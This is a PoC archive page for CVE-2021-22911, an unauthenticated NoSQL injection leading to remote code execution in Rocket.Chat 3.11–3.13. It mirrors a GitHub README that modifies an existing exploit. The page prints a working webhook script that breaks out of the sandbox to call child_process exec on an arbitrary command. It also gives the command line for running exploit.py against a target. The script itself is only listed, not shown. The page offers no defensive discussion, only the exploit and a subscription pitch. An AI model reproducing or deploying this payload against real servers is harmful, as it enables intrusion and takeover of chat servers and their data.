Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2021-22911 PoC — Rocket.Chat 安全漏洞

Source
https://github.com/Weisant/CVE-2021-22911-EXP
Associated Vulnerability
Title:Rocket.Chat 安全漏洞 (CVE-2021-22911)
Description:A improper input sanitization vulnerability exists in Rocket.Chat server 3.11, 3.12 & 3.13 that could lead to unauthenticated NoSQL injection, resulting potentially in RCE.
Description
some small changes to the code by CsEnox
Readme
# CVE-2021-22911-EXP

## Info

Some small changes to the [code](https://github.com/CsEnox/CVE-2021-22911) by CsEnox:

1. Replace the `oathtool` library with the `pyotp` library.
2. Modify the format of the JavaScript script used to construct the webhook.

```javascript
class Script {
  process_incoming_request({ request }) {
const require = console.log.constructor('return process.mainModule.require')();
const { exec } = require('child_process');
exec('your command');
  }
}
```

## Notice

1. You can check if the webhook has been executed successfully using the `wegt` command, provided that you have installed this command in the Docker container.
2. The default administrator username in the code is `admin`.

## Usage

```cmd
python exploit.py -u "user@rocket.local" -a "admin@rocket.local" -t "http://rocket.local"
```
File Snapshot

 [4.0K]  /data/pocs/e2c8cda4098ba47550f20cf9629ad01643241f74
├── [6.4K]  exploit.py
└── [ 831]  README.md

0 directories, 2 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →